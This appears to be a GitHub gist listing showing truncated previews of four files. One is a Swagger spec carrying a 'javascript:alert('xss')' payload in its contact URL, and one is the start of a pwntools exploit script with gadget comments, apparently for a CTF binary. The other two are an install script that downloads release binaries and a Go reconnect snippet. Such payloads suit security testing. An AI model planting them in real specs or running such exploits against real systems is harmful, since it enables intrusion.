View swagger-xss.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"swagger": "2.0", | |
"info": { | |
"version": "1.0.0", | |
"title": "Swagger Petstore", | |
"contact":{ | |
"name": "API Support", | |
"url": "javascript:alert('xss')" | |
} | |
}, |
View zloinstall.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
version="0.0.1" | |
# os="Linux" | |
os="MacOs" | |
mkdir -p "/tmp/zlo-$version" | |
cd "/tmp/zlo-$version" | |
curl -OL "https://github.com/morentharia/gozlochromeext/releases/download/v$version/gozlochromeext$os" || exit 1 | |
curl -OL "https://github.com/morentharia/gozlodeistva/releases/download/release-$version/gozlo$os" || exit 1 |
View pwn_work_like_charm.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
# 0x08048087 mov ecx, esp | |
# 0x08048089 mov dl, 0x14 | |
# 0x0804808b mov bl, 1 | |
# 0x0804808d mov al, 4 | |
def leak_esp(r): |
View reconnect_publsh.go
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"fmt" | |
"time" | |
) | |
func connector() chan struct{} { | |
fmt.Println("zzzz") | |
connectCh := make(chan struct{}) |